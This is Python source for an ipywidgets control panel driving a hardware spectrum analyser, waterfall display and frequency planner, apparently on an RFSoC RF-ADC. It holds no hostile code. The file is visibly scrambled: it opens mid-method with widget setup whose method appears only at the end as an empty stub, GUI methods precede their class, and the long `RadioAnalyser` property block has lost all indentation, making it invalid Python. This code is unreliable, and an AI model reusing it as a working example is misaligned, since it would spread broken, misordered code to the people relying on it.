                              DropDown(callback=self._update_config,
                                       options=[('Seaborn', 'seaborn'),
                                                ('Simple White', 'simple_white'),
                                                ('Plotly', 'plotly'),
                                                ('Plotly White', 'plotly_white'),
                                                ('Plotly Dark', 'plotly_dark')],
                                       value='plotly',
                                       dict_id='plotly_theme',
                                       description='Plotly Theme:')})
        self._widgets.update({'colour_map' :
                              DropDown(callback=self._update_config,
                                       options=[('Grey' , 'gray'),
                                                ('Spring' , 'spring'),
                                                ('Summer' , 'summer'),
                                                ('Autumn' , 'autumn'),
                                                ('Winter' , 'winter'),
                                                ('Cool' , 'cool'),
                                                ('Hot' , 'hot'),
                                                ('Copper' , 'copper'),
                                                ('Rainbow', 'rainbow'),
                                                ('Jet' , 'jet')],
                                       value='gray',
                                       dict_id='colour_map',
                                       description='Colour Map:',
                                       description_width='100px')})
        self._widgets.update({'line_colour' :
                              DropDown(callback=self._update_config,
                                       options=list(mcolors.CSS4_COLORS),
                                       value='white',
                                       dict_id='line_colour',
                                       description='Line Colour:')})
        self._widgets.update({'line_fill' :
                              DropDown(callback=self._update_config,
                                       options=list(mcolors.CSS4_COLORS),
                                       value='lightpink',
                                       dict_id='line_fill',
                                       description='Line Fill:')})
        self._widgets.update({'spectrogram_performance' :
                              DropDown(callback=self._update_config,
                                       options=[('Low', 8),
                                                ('Medium', 4),
                                                ('High', 2)],
                                       value=2,
                                       dict_id='spectrogram_performance',
                                       description='Resolution:',
                                       description_width='100px')})
        # --- Numeric entry widgets ---------------------------------------
        self._widgets.update({'number_max_indices' :
                              IntText(callback=self._update_config,
                                      value=self._config['number_max_indices'],
                                      min_value=1,
                                      max_value=64,
                                      step=1,
                                      dict_id='number_max_indices',
                                      description='Number of Maximums:')})
        self._widgets.update({'number_min_indices' :
                              IntText(callback=self._update_config,
                                      value=self._config['number_min_indices'],
                                      min_value=1,
                                      max_value=64,
                                      step=1,
                                      dict_id='number_min_indices',
                                      description='Number of Minimums:')})
        self._widgets.update({'number_frames' :
                              FloatText(callback=self._update_config,
                                        value=self._config['number_frames'],
                                        min_value=1,
                                        max_value=64,
                                        step=1,
                                        dict_id='number_frames',
                                        description='Number Frames:',
                                        description_width='100px')})
        self._widgets.update({'ymin' :
                              FloatText(callback=self._update_config,
                                        value=self._config['ymin'],
                                        min_value=-300,
                                        max_value=300,
                                        step=1,
                                        dict_id='ymin',
                                        description='Y-Low (dB):',
                                        description_width='100px')})
        self._widgets.update({'ymax' :
                              FloatText(callback=self._update_config,
                                        value=self._config['ymax'],
                                        min_value=-300,
                                        max_value=300,
                                        step=1,
                                        dict_id='ymax',
                                        description='Y-High (dB):',
                                        description_width='100px')})
        self._widgets.update({'centre_frequency' :
                              FloatText(callback=self._update_config,
                                        value=self._config['centre_frequency'],
                                        min_value=0,
                                        max_value=self.analyser._block.BlockStatus['SamplingFreq']*1e3,
                                        step=1,
                                        dict_id='centre_frequency',
                                        description='Centre Frequency (MHz):')})
        self._widgets.update({'nyquist_stopband' :
                              FloatText(callback=self._update_config,
                                        value=self._config['nyquist_stopband'],
                                        min_value=50,
                                        max_value=100,
                                        step=1,
                                        dict_id='nyquist_stopband',
                                        description='Nyquist Stopband (%):')})
        self._widgets.update({'height' :
                              FloatText(callback=self._update_config,
                                        value=self._config['height'],
                                        min_value=200,
                                        max_value=2160,
                                        step=1,
                                        dict_id='height',
                                        description='Plot Height (Px):')})
        self._widgets.update({'width' :
                              FloatText(callback=self._update_config,
                                        value=self._config['width'],
                                        min_value=400,
                                        max_value=4096,
                                        step=1,
                                        dict_id='width',
                                        description='Plot Width (Px):')})
        #self._widgets.update({'update_frequency' :
        #                      FloatText(callback=self._update_config,
        #                                value=self._config['update_frequency'],
        #                                min_value=5,
        #                                max_value=12,
        #                                step=1,
        #                                dict_id='update_frequency',
        #                                description='Update Frequency:')})
        self._widgets.update({'update_frequency' :
                              DropDown(callback=self._update_config,
                                       options=[('Low', 5),
                                                ('Medium', 10),
                                                ('High', 15)],
                                       value=5,
                                       dict_id='update_frequency',
                                       description='Plot Performance:')})
        self._widgets.update({'zmin' :
                              FloatText(callback=self._update_config,
                                        value=self._config['zmin'],
                                        min_value=-300,
                                        max_value=300,
                                        step=1,
                                        dict_id='zmin',
                                        description='Z-Low (dB):',
                                        description_width='100px')})
        self._widgets.update({'zmax' :
                              FloatText(callback=self._update_config,
                                        value=self._config['zmax'],
                                        min_value=-300,
                                        max_value=300,
                                        step=1,
                                        dict_id='zmax',
                                        description='Z-High (dB):',
                                        description_width='100px')})
        self._widgets.update({'quality' :
                              FloatText(callback=self._update_config,
                                        value=self._config['quality'],
                                        min_value=80,
                                        max_value=100,
                                        step=1,
                                        dict_id='quality',
                                        description='Quality (%):',
                                        description_width='100px')})
        # --- Toggle buttons ----------------------------------------------
        self._widgets.update({'constellation_enable' :
                              Button(callback=self._update_config,
                                     description_on = 'On',
                                     description_off = 'Off',
                                     state=False,
                                     dict_id='constellation_enable')})
        self._widgets.update({'dma_enable' :
                              Button(callback=self._update_config,
                                     description_on = 'On',
                                     description_off = 'Off',
                                     state=False,
                                     dict_id='dma_enable')})
        self._widgets.update({'spectrum_enable' :
                              Button(callback=self._update_config,
                                     description_on = 'On',
                                     description_off = 'Off',
                                     state=False,
                                     dict_id='spectrum_enable')})
        self._widgets.update({'waterfall_enable' :
                              Button(callback=self._update_config,
                                     description_on = 'On',
                                     description_off = 'Off',
                                     state=False,
                                     dict_id='waterfall_enable')})
        self._widgets.update({'reset_ofdm_receiver' :
                              QuickButton(callback=self.analyser.reset_ofdm_receiver,
                                          description_on = 'Resetting',
                                          description_off = 'Reset',
                                          state=False,
                                          dict_id='reset_ofdm_receiver')})
        # --- Read-only status labels -------------------------------------
        self._widgets.update({'sample_frequency_label' :
                              Label(value=str((self.analyser.sample_frequency/self.analyser.decimation_factor)*1e-6),
                                    svalue='Sample Frequency: ',
                                    evalue=' MHz',
                                    dict_id='sample_frequency_label')})
        self._widgets.update({'resolution_bandwidth_label' :
                              Label(value=str(((self.analyser.sample_frequency/self.analyser.decimation_factor)/ \
                                               self.analyser.fftsize)*1e-3),
                                    svalue='Frequency Resolution: ',
                                    evalue=' kHz',
                                    dict_id='resolution_bandwidth_label')})
        self._widgets.update({'display_max' :
                              CheckBox(callback=self._update_config,
                                       description='Display Maximum',
                                       value=self._config['display_max'],
                                       dict_id='display_max')})
        self._widgets.update({'display_min' :
                              CheckBox(callback=self._update_config,
                                       description='Display Minimum',
                                       value=self._config['display_min'],
                                       dict_id='display_min')})
        # --- FFT-window preview plot -------------------------------------
        self._window_plot = go.FigureWidget(layout={'hovermode' : 'closest',
                                                    'height' : 225,
                                                    'width' : 300,
                                                    'margin' : {
                                                        't':0, 'b':20, 'l':0, 'r':0
                                                    },
                                                    'showlegend' : False,
                                                    },
                                            data=[{
                                                'x': np.arange(self.analyser.fftsize),
                                                'y': np.ones(self.analyser.fftsize),
                                                'line':{
                                                    'color' : 'palevioletred',
                                                    'width' : 2
                                                },
                                                'fill' : 'tozeroy',
                                                'fillcolor' : 'rgba(128, 128, 128, 0.5)'
                                            }])
        # --- Accordion containers ----------------------------------------
        self._accordions.update({'properties' :
                                 ipw.Accordion(children=[ipw.HBox(
                                     [ipw.VBox([ipw.Label(value='Spectrum Analyzer: ', layout=ipw.Layout(width='150px')),
                                                ipw.Label(value='Spectrogram: ', layout=ipw.Layout(width='150px'))]),
                                      ipw.VBox([self._widgets['spectrum_enable'].get_widget(),
                                                self._widgets['waterfall_enable'].get_widget()])],
                                     layout=ipw.Layout(justify_content='space-around')),
                                     ipw.VBox([self._widgets['centre_frequency'].get_widget(),
                                               self._widgets['decimation_factor'].get_widget(),
                                               self._widgets['fftsize'].get_widget()]),
                                     ipw.VBox([self._widgets['post_process'].get_widget(),
                                               self._widgets['number_frames'].get_widget(),
                                               self._widgets['spectrum_type'].get_widget(),
                                               self._widgets['spectrum_units'].get_widget(),
                                               self._widgets['ymin'].get_widget(),
                                               self._widgets['ymax'].get_widget()]),
                                     ipw.VBox([ipw.Label(value='Experimental Control Panel'),
                                               self._widgets['ddc_centre_frequency'].get_widget(),
                                               ipw.HBox([
                                                   ipw.VBox([self._widgets[_freq_planner_props[i]].get_widget() for i in range(0,int(len(_freq_planner_props)/2))]),
                                                   ipw.VBox([self._widgets[_freq_planner_props[i]].get_widget() for i in range(int(len(_freq_planner_props)/2),len(_freq_planner_props))])
                                               ])
                                               ]),
                                     ipw.VBox([self._widgets['spectrogram_performance'].get_widget(),
                                               self._widgets['colour_map'].get_widget(),
                                               self._widgets['zmin'].get_widget(),
                                               self._widgets['zmax'].get_widget()]),
                                     ipw.VBox([self._window_plot,
                                               self._widgets['window'].get_widget()]),
                                     ipw.VBox([self._widgets['nyquist_stopband'].get_widget(),
                                               self._widgets['height'].get_widget(),
                                               self._widgets['width'].get_widget(),
                                               self._widgets['update_frequency'].get_widget()])
                                 ])})
        """ Frequency Planner Widgets
        ipw.VBox([self._widgets['ddc_centre_frequency'].get_widget(),
        self._widgets['ddc_plan_hd2_db'].get_widget(),
        self._widgets['ddc_plan_hd3_db'].get_widget(),
        self._widgets['ddc_plan_pll_mix_db'].get_widget(),
        self._widgets['ddc_plan_off_spur_db'].get_widget(),
        self._widgets['ddc_plan_tis_spur_db'].get_widget(),
        self._widgets['ddc_plan_nsd_db'].get_widget(),
        ipw.HBox([
        ipw.VBox([self._widgets[_freq_planner_props[i]].get_widget() for i in range(0,int(len(_freq_planner_props)/2))]),
        ipw.VBox([self._widgets[_freq_planner_props[i]].get_widget() for i in range(int(len(_freq_planner_props)/2),len(_freq_planner_props))])
        ])
        ]),
        """
        self._accordions['properties'].set_title(0, 'System')
        self._accordions['properties'].set_title(1, 'Receiver')
        self._accordions['properties'].set_title(2, 'Spectrum Analyzer')
        self._accordions['properties'].set_title(3, 'Frequency Planner')
        self._accordions['properties'].set_title(4, 'Spectrogram')
        self._accordions['properties'].set_title(5, 'Window Settings')
        self._accordions['properties'].set_title(6, 'Plot Settings')
        """The transmit system accordion"""
        self._accordions.update({'constellation_properties' :
                                 ipw.Accordion(children=[ipw.HBox([ipw.VBox([ipw.Label(value='Constellation: ', layout=ipw.Layout(width='150px')),
                                                                             ipw.Label(value='Reset Receiver: ', layout=ipw.Layout(width='150px'))]),
                                                                   ipw.VBox([self._widgets['constellation_enable'].get_widget(),
                                                                             self._widgets['reset_ofdm_receiver'].get_widget()])],
                                                                  layout=ipw.Layout(justify_content='space-around'))],
                                               layout=ipw.Layout(justify_content='flex-start',
                                                                 width='initial'))})
        self._accordions['constellation_properties'].set_title(0, 'System')
        # Push the initial configuration to hardware and widgets.
        self._update_config(self._config)
    def _update_config(self, config_dict):
        """Merge *config_dict* into the stored configuration and queue the
        affected keys for a frontend refresh.

        Raises:
            KeyError: if any key is not a recognised configuration entry
                (checked before anything is applied).
        """
        for key in config_dict.keys():
            if key not in self._config:
                raise KeyError(''.join(['Key ', str(key), ' not in dictionary.']))
        self._config.update(config_dict)
        self._update_que.append(config_dict.keys())
        # Kick off the frontend refresh unless one is already draining the
        # queue (re-entrancy guard).
        if not self._running_update:
            self._running_update = True
            self._update_frontend()
    def _update_frontend(self):
        """Drain the queued configuration changes, applying each key to the
        analyser and its widget while live plotting is paused."""
        if self._update_que:
            # Pause the spectrum plot and wait for the DMA status to reach
            # 32 (idle) before touching any settings.
            plot_running = self._config['spectrum_enable']
            self.analyser.spectrum_enable = False
            while self.analyser.dma_status != 32:
                time.sleep(0.1)
            while self._running_update:
                keys = self._update_que.pop(0)
                for key in keys:
                    if key in self._config:
                        if key in ['centre_frequency', 'decimation_factor', 'quality']:
                            # These settings disturb the spectrogram stream,
                            # so force the waterfall off first.
                            self._widgets['waterfall_enable'].value = False
                            self.analyser.waterfall_enable = False
                        setattr(self.analyser, key, self._config[key])
                        self._widgets[key].value = self._config[key]
                        if key in ['plotly_theme', 'line_colour', 'decimation_factor',
                                   'spectrum_enable', 'waterfall_enable']:
                            self._update_widgets(key)
                        if key in ['fftsize', 'window']:
                            self._update_figurewidgets(key)
                self._update_textwidgets()
                time.sleep(0.2)
                if not self._update_que:
                    # Queue drained: restore the plot state and exit the loop.
                    self.analyser.spectrum_enable = plot_running
                    self._running_update = False
        self._running_update = False
    def _update_textwidgets(self):
        """Refresh the derived read-only labels: effective sample rate
        (MHz) and frequency resolution per FFT bin (kHz)."""
        self._widgets['sample_frequency_label'].value = str((self.analyser.sample_frequency/ \
            self.analyser.decimation_factor)*1e-6)
        self._widgets['resolution_bandwidth_label'].value = str(((self.analyser.sample_frequency/ \
            self.analyser.decimation_factor)/self.analyser.fftsize)*1e-3)
    def _update_figurewidgets(self, key):
        """Refresh the FFT-window preview plot after a change to *key*."""
        if key in ['fftsize']:
            # A new FFT size changes the x-axis length as well as the
            # window samples.
            self._window_plot.data[0].x = np.arange(self.analyser.fftsize)
            self._window_plot.data[0].y = self.analyser.spectrum_window
        elif key in ['window']:
            self._window_plot.data[0].y = self.analyser.spectrum_window
    def _update_widgets(self, key):
        """Propagate a changed setting named *key* to the dependent widgets."""
        if key in ['line_colour']:
            # Recolour the window-preview trace and every toggle button.
            self._window_plot.data[0].line.color = self._config['line_colour']
            self._widgets['dma_enable'].button_colour = self._config['line_colour']
            self._widgets['spectrum_enable'].button_colour = self._config['line_colour']
            self._widgets['waterfall_enable'].button_colour = self._config['line_colour']
            self._widgets['constellation_enable'].button_colour = self._config['line_colour']
            self._widgets['reset_ofdm_receiver'].button_colour = self._config['line_colour']
        elif key in ['plotly_theme']:
            self._window_plot.layout.template = self._config['plotly_theme']
        elif key in ['decimation_factor']:
            # Higher decimation narrows the span, so use a finer frequency
            # step; index is log2(factor) - 1 for factors 2..2048.
            step_list = [10, 1, 1, 1, 0.1, 0.1, 0.1, 0.01, 0.01, 0.01, 0.001]
            self._widgets['centre_frequency'].step = step_list[int(np.log2(self._config['decimation_factor']) - 1)]
        elif key in ['spectrum_enable']:
            # The DMA button mirrors whether either plot is consuming data.
            if self._config['spectrum_enable']:
                self._widgets['dma_enable'].configure_state(True)
            else:
                if not self._config['waterfall_enable']:
                    self._widgets['dma_enable'].configure_state(False)
        elif key in ['waterfall_enable']:
            if self._config['waterfall_enable']:
                self._widgets['dma_enable'].configure_state(True)
            else:
                if not self._config['spectrum_enable']:
                    self._widgets['dma_enable'].configure_state(False)
    def spectrum_analyser(self, config=None):
        """Return the assembled spectrum-analyser dashboard widget.

        Args:
            config: optional configuration dict applied before the
                dashboard is returned.
        """
        if config is not None:
            self.config = config
        return ipw.VBox([ipw.HBox([ipw.VBox([self.analyser.spectrum(),
                                             self.analyser.waterfall(),
                                             ipw.HBox([self._widgets['sample_frequency_label'].get_widget(),
                                                       ipw.Label(value=' | '),
                                                       self._widgets['resolution_bandwidth_label'].get_widget()],
                                                      layout=ipw.Layout(justify_content='flex-end'))
                                             ]),
                                   self._accordions['properties']
                                   ])
                         ])
    def constellation_plot(self):
        """Return the constellation inspector plot beside its controls."""
        return ipw.HBox([self._inspector.constellation_plot(),
                         self._accordions['constellation_properties']
                         ])
class RadioAnalyser():
    def __init__(self,
                 adc_tile,
                 adc_block,
                 adc_description,
                 spectrum_analyser,
                 decimator):
        """Store references to the RF-ADC tile/block pair and the
        spectrum-analyser and decimator cores this wrapper drives.

        Args:
            adc_tile: RF-ADC tile driver.
            adc_block: RF-ADC block driver within that tile.
            adc_description: ADC descriptor; index 0 selects the tile's
                status entry during safe restarts.
            spectrum_analyser: spectrum analyser core wrapper.
            decimator: soft decimator core wrapper.
        """
        self._tile = adc_tile
        self._block = adc_block
        self._spectrum_analyser = spectrum_analyser
        self._decimator = decimator
        self._adc_description = adc_description
@property
def centre_frequency(self):
return abs(self._block.MixerSettings['Freq'])
@centre_frequency.setter
def centre_frequency(self, centre_frequency):
nyquist_zone = int(np.ceil(centre_frequency/(self._block.BlockStatus['SamplingFreq']*1e3/2)))
if nyquist_zone == 0:
nyquist_zone = 1
if nyquist_zone != self._block.NyquistZone:
self._block.NyquistZone = nyquist_zone
if (nyquist_zone % 2) == 0:
self._block.MixerSettings['Freq'] = centre_frequency
else:
self._block.MixerSettings['Freq'] = -centre_frequency
self._spectrum_analyser.centre_frequency = centre_frequency*1e6
self._block.UpdateEvent(1)
@property
def decimation_factor(self):
if self._decimator.decimation_factor > 0:
return self._block.DecimationFactor * self._decimator.decimation_factor
else:
return self._block.DecimationFactor
@decimation_factor.setter
def decimation_factor(self, decimation_factor):
word_lut = [8, 4, 2]
sel = int(np.log2(decimation_factor))
if decimation_factor in [2, 4, 8]:
self._block.DecimationFactor = decimation_factor
self._block.FabRdVldWords = word_lut[sel-1]
self._spectrum_analyser.ssr_packetsize = 0
self._spectrum_analyser.ssr_mode = 4-sel
self._safe_restart()
self._decimator.decimation_factor = 0
self._spectrum_analyser.sample_frequency = self._block.BlockStatus['SamplingFreq']*1e9
self._spectrum_analyser.decimation_factor = decimation_factor
self._spectrum_analyser.ssr_packetsize = int(self._spectrum_analyser.fft_size/8)
elif decimation_factor in [16, 32, 64, 128, 256, 512, 1024, 2048]:
self._block.DecimationFactor = 8
self._block.FabRdVldWords = 2
self._spectrum_analyser.ssr_packetsize = 0
self._spectrum_analyser.ssr_mode = 0
self._safe_restart()
self._decimator.decimation_factor = int(decimation_factor/8)
self._spectrum_analyser.sample_frequency = self._block.BlockStatus['SamplingFreq']*1e9
self._spectrum_analyser.decimation_factor = decimation_factor
self._spectrum_analyser.ssr_packetsize = int(self._spectrum_analyser.fft_size/8)
@property
def number_frames(self):
return self._spectrum_analyser.plot.data_windowsize
@number_frames.setter
def number_frames(self, number_frames):
if number_frames in range(1, 65):
self._spectrum_analyser.plot.data_windowsize = int(number_frames)
@property
def sample_frequency(self):
return self._block.BlockStatus['SamplingFreq']*1e9
@property
def calibration_mode(self):
return self._block.CalibrationMode
@calibration_mode.setter
def calibration_mode(self, calibration_mode):
if calibration_mode in [1, 2]:
self._block.CalibrationMode = calibration_mode
self._safe_restart()
@property
def nyquist_stopband(self):
return self._spectrum_analyser.nyquist_stopband * 100
@nyquist_stopband.setter
def nyquist_stopband(self, nyquist_stopband):
self._spectrum_analyser.nyquist_stopband = nyquist_stopband/100
@property
def fftsize(self):
return self._spectrum_analyser.fft_size
@fftsize.setter
def fftsize(self, fftsize):
self._spectrum_analyser.fft_size = fftsize
@property
def spectrum_type(self):
return self._spectrum_analyser.spectrum_type
@spectrum_type.setter
def spectrum_type(self, spectrum_type):
self._spectrum_analyser.spectrum_type = spectrum_type
@property
def spectrum_units(self):
return self._spectrum_analyser.spectrum_units
@spectrum_units.setter
def spectrum_units(self, spectrum_units):
self._spectrum_analyser.spectrum_units = spectrum_units
@property
def window(self):
return self._spectrum_analyser.window
@window.setter
def window(self, window_type):
self._spectrum_analyser.window = window_type
@property
def spectrum_window(self):
return self._spectrum_analyser.spectrum_window
@property
def height(self):
return self._spectrum_analyser.height
@height.setter
def height(self, height):
self._spectrum_analyser.height = height
@property
def width(self):
return self._spectrum_analyser.width
@width.setter
def width(self, width):
self._spectrum_analyser.width = width
@property
def spectrum_enable(self):
return self._spectrum_analyser.plot.enable_updates
@spectrum_enable.setter
def spectrum_enable(self, enable):
if enable:
self._spectrum_analyser.plot.enable_updates = True
else:
self._spectrum_analyser.plot.enable_updates = False
@property
def waterfall_enable(self):
return self._spectrum_analyser.spectrogram.enable_updates
@waterfall_enable.setter
def waterfall_enable(self, enable):
if enable:
self._spectrum_analyser.spectrogram.enable_updates = True
else:
self._spectrum_analyser.spectrogram.enable_updates = False
@property
def dma_enable(self):
return self._spectrum_analyser.dma_enable
@dma_enable.setter
def dma_enable(self, enable):
if enable:
self._spectrum_analyser.dma_enable = 1
self._spectrum_analyser.timer.start()
else:
self._spectrum_analyser.timer.stop()
self._spectrum_analyser.dma_enable = 0
@property
def update_frequency(self):
return self._spectrum_analyser.update_frequency
@update_frequency.setter
def update_frequency(self, update_frequency):
self._spectrum_analyser.update_frequency = update_frequency
@property
def plotly_theme(self):
return self._spectrum_analyser.plotly_theme
@plotly_theme.setter
def plotly_theme(self, plotly_theme):
self._spectrum_analyser.plotly_theme = plotly_theme
@property
def line_colour(self):
return self._spectrum_analyser.line_colour
@line_colour.setter
def line_colour(self, line_colour):
self._spectrum_analyser.line_colour = line_colour
@property
def line_fill(self):
return self._spectrum_analyser.line_fill
@line_fill.setter
def line_fill(self, line_fill):
self._spectrum_analyser.line_fill = line_fill
@property
def zmin(self):
return self._spectrum_analyser.zmin
@zmin.setter
def zmin(self, zmin):
self._spectrum_analyser.zmin = zmin
@property
def zmax(self):
return self._spectrum_analyser.zmax
@zmax.setter
def zmax(self, zmax):
self._spectrum_analyser.zmax = zmax
@property
def quality(self):
return self._spectrum_analyser.quality
@quality.setter
def quality(self, quality):
self._spectrum_analyser.quality = quality
@property
def post_process(self):
return self._spectrum_analyser.plot.post_process
@post_process.setter
def post_process(self, post_process):
if post_process in ['max', 'min', 'average', 'median']:
self._spectrum_analyser.plot.post_process = post_process
else:
self._spectrum_analyser.plot.post_process = 'none'
@property
def display_max(self):
return self._spectrum_analyser.plot.display_max
@display_max.setter
def display_max(self, display_max):
self._spectrum_analyser.plot.display_max = display_max
@property
def display_min(self):
return self._spectrum_analyser.plot.display_min
@display_min.setter
def display_min(self, display_min):
self._spectrum_analyser.plot.display_min = display_min
@property
def number_max_indices(self):
return self._spectrum_analyser.plot.number_max_indices
@number_max_indices.setter
def number_max_indices(self, number_max_indices):
self._spectrum_analyser.plot.number_max_indices = number_max_indices
@property
def colour_map(self):
return self._spectrum_analyser.spectrogram.cmap
@colour_map.setter
def colour_map(self, colour_map):
self._spectrum_analyser.spectrogram.cmap = colour_map
@property
def spectrogram_performance(self):
return self._spectrum_analyser.spectrogram.ypixel
@spectrogram_performance.setter
def spectrogram_performance(self, performance):
self._spectrum_analyser.spectrogram.ypixel = performance
@property
def ymin(self):
return self._spectrum_analyser.plot.yrange[0]
@ymin.setter
def ymin(self, ymin):
temp_range = list(self._spectrum_analyser.plot.yrange)
temp_range[0] = ymin
self._spectrum_analyser.plot.yrange = tuple(temp_range)
@property
def ymax(self):
return self._spectrum_analyser.plot.yrange[1]
@ymax.setter
def ymax(self, ymax):
temp_range = list(self._spectrum_analyser.plot.yrange)
temp_range[1] = ymax
self._spectrum_analyser.plot.yrange = tuple(temp_range)
@property
def number_min_indices(self):
return self._spectrum_analyser.plot.number_min_indices
@number_min_indices.setter
def number_min_indices(self, number_min_indices):
self._spectrum_analyser.plot.number_min_indices = number_min_indices
@property
def display_ddc_plan(self):
return self._spectrum_analyser.plot.display_ddc_plan
@display_ddc_plan.setter
def display_ddc_plan(self, display_ddc_plan):
self._spectrum_analyser.plot.display_ddc_plan = display_ddc_plan
@property
def ddc_centre_frequency(self):
return self._spectrum_analyser.plot.ddc_centre_frequency*1e-6
@ddc_centre_frequency.setter
def ddc_centre_frequency(self, ddc_centre_frequency):
self._spectrum_analyser.plot.ddc_centre_frequency = ddc_centre_frequency*1e6
self._spectrum_analyser.plot.update_ddc_plan()
@property
def ddc_plan_hd2_db(self):
return self._spectrum_analyser.plot.ddc_plan.hd2_db
@ddc_plan_hd2_db.setter
def ddc_plan_hd2_db(self, hd2_db):
self._spectrum_analyser.plot.ddc_plan.hd2_db = hd2_db
self._spectrum_analyser.plot.update_ddc_plan()
@property
def ddc_plan_hd3_db(self):
return self._spectrum_analyser.plot.ddc_plan.hd3_db
@ddc_plan_hd3_db.setter
def ddc_plan_hd3_db(self, hd3_db):
self._spectrum_analyser.plot.ddc_plan.hd3_db = hd3_db
self._spectrum_analyser.plot.update_ddc_plan()
@property
def ddc_plan_nsd_db(self):
return self._spectrum_analyser.plot.ddc_plan.nsd_db
@ddc_plan_nsd_db.setter
def ddc_plan_nsd_db(self, nsd_db):
self._spectrum_analyser.plot.ddc_plan.nsd_db = nsd_db
self._spectrum_analyser.plot.update_ddc_plan()
@property
def ddc_plan_pll_mix_db(self):
return self._spectrum_analyser.plot.ddc_plan.pll_mix_db
@ddc_plan_pll_mix_db.setter
def ddc_plan_pll_mix_db(self, pll_mix_db):
self._spectrum_analyser.plot.ddc_plan.pll_mix_db = pll_mix_db
self._spectrum_analyser.plot.update_ddc_plan()
@property
def ddc_plan_off_spur_db(self):
return self._spectrum_analyser.plot.ddc_plan.off_spur_db
@ddc_plan_off_spur_db.setter
def ddc_plan_off_spur_db(self, off_spur_db):
self._spectrum_analyser.plot.ddc_plan.off_spur_db = off_spur_db
self._spectrum_analyser.plot.update_ddc_plan()
@property
def ddc_plan_tis_spur_db(self):
return self._spectrum_analyser.plot.ddc_plan.tis_spur_db
@ddc_plan_tis_spur_db.setter
def ddc_plan_tis_spur_db(self, tis_spur_db):
self._spectrum_analyser.plot.ddc_plan.tis_spur_db = tis_spur_db
self._spectrum_analyser.plot.update_ddc_plan()
@property
def dma_status(self):
return self._spectrum_analyser.dma_status
def spectrum(self):
return self._spectrum_analyser.plot.get_plot()
def waterfall(self):
return self._spectrum_analyser.spectrogram.get_plot()
def _safe_restart(self):
tile_number = self._adc_description[0]
self._tile.ShutDown()
running = self._tile._parent.IPStatus['ADCTileStatus'][tile_number]['PowerUpState']
while running:
time.sleep(0.1)
running = self._tile._parent.IPStatus['ADCTileStatus'][tile_number]['PowerUpState']
self._tile.StartUp()
running = self._tile._parent.IPStatus['ADCTileStatus'][tile_number]['PowerUpState']
while not running:
time.sleep(0.1)
running = self._tile._parent.IPStatus['ADCTileStatus'][tile_number]['PowerUpState']
def _create_mmio_property(idx):
def _get(self):
return self._spectrum_analyser.plot.display_ddc_plan[idx]
def _set(self, value):
if value:
self._spectrum_analyser.plot.display_ddc_plan[idx] = True
else:
self._spectrum_analyser.plot.display_ddc_plan[idx] = False
self._spectrum_analyser.plot.update_ddc_plan()
return property(_get, _set)
# Dynamically attach one display-toggle property to RadioAnalyser per
# frequency-planner overlay entry (names supplied by _freq_planner_props).
for idx, name in enumerate(_freq_planner_props):
    setattr(RadioAnalyser, name, _create_mmio_property(idx))
class RadioAnalyserGUI():
    """ipywidgets front-end for a :class:`RadioAnalyser`.

    Builds the control widgets and properties accordion, keeps ``_config``
    in sync with both the widgets and the underlying analyser, and
    serialises configuration changes through a small queue so only one
    frontend update runs at a time.
    """
    def __init__(self,
                 adc_tile,
                 adc_block,
                 adc_description,
                 spectrum_analyser,
                 decimator):
        self._widgets = {}        # widget name -> wrapper widget object
        self._accordions = {}     # accordion name -> ipw.Accordion
        self._running_update = False  # guards re-entrant frontend updates
        self._update_que = []         # queued key-sets awaiting application
        self._stopped = False
        # Enable flags saved across stop()/start() cycles.
        self._runtime_status = {'spectrum_enable' : False, 'waterfall_enable' : False}
        self.analyser = RadioAnalyser(adc_tile=adc_tile,
                                      adc_block=adc_block,
                                      adc_description=adc_description,
                                      spectrum_analyser=spectrum_analyser,
                                      decimator=decimator)
        self._config = {'centre_frequency' : 819,
                        'nyquist_stopband' : 80,
                        'decimation_factor' : self.analyser.decimation_factor,
                        'calibration_mode' : self.analyser.calibration_mode,
                        'fftsize' : 2048,
                        'spectrum_type' : self.analyser.spectrum_type,
                        'spectrum_units' : self.analyser.spectrum_units,
                        'window' : 'hanning',
                        'height' : self.analyser.height,
                        'spectrum_enable' : self.analyser.spectrum_enable,
                        'waterfall_enable' : self.analyser.waterfall_enable,
                        'dma_enable' : self.analyser.dma_enable,
                        'update_frequency' : 10,
                        'plotly_theme' : self.analyser.plotly_theme,
                        'line_colour' : self.analyser.line_colour,
                        # Fix: the 'line_fill' widget created in
                        # _initialise_frontend reports dict_id='line_fill';
                        # without this key its callback would raise KeyError
                        # in _update_config.
                        'line_fill' : self.analyser.line_fill,
                        'zmin' : self.analyser.zmin,
                        'zmax' : self.analyser.zmax,
                        'quality' : self.analyser.quality,
                        'width' : self.analyser.width,
                        'post_process' : 'average',
                        'number_frames' : 6,
                        'display_max' : False,
                        'display_min' : False,
                        'number_max_indices' : 1,
                        'number_min_indices' : 1,
                        'colour_map' : self.analyser.colour_map,
                        'spectrogram_performance' : 4,
                        'ymin' : self.analyser.ymin,
                        'ymax' : self.analyser.ymax,
                        'enable_rx_alias' : False,
                        'enable_rx_image' : False,
                        'enable_hd2' : False,
                        'enable_hd2_image' : False,
                        'enable_hd3' : False,
                        'enable_hd3_image' : False,
                        'enable_pll_mix_up' : False,
                        'enable_pll_mix_up_image' : False,
                        'enable_pll_mix_down' : False,
                        'enable_pll_mix_down_image' : False,
                        'ddc_centre_frequency' : 0,
                        'ddc_plan_hd2_db' : self.analyser.ddc_plan_hd2_db,
                        'ddc_plan_hd3_db' : self.analyser.ddc_plan_hd3_db,
                        'ddc_plan_nsd_db' : self.analyser.ddc_plan_nsd_db,
                        'ddc_plan_pll_mix_db' : self.analyser.ddc_plan_pll_mix_db,
                        'ddc_plan_off_spur_db' : self.analyser.ddc_plan_off_spur_db,
                        'ddc_plan_tis_spur_db' : self.analyser.ddc_plan_tis_spur_db}
        self._initialise_frontend()

    @property
    def config(self):
        """The current configuration dictionary."""
        return self._config

    @config.setter
    def config(self, config_dict):
        self._update_config(config_dict)

    def start(self):
        """Resume the enable states that were saved by stop()."""
        self.config = {'spectrum_enable' : self._runtime_status['spectrum_enable'],
                       'waterfall_enable' : self._runtime_status['waterfall_enable']}
        self._stopped = False

    def stop(self):
        """Save the current enable states and switch all updates off."""
        if not self._stopped:
            self._runtime_status.update({'spectrum_enable' : self._config['spectrum_enable'],
                                         'waterfall_enable' : self._config['waterfall_enable']})
            self.config = {'spectrum_enable' : False,
                           'waterfall_enable' : False}
            self._stopped = True

    def _initialise_frontend(self):
        """Create every control widget, the window preview plot and the
        properties accordion, then push the initial config to them.

        Initial widget values that differ from ``_config`` defaults are
        overwritten by the final ``_update_config(self._config)`` call.
        """
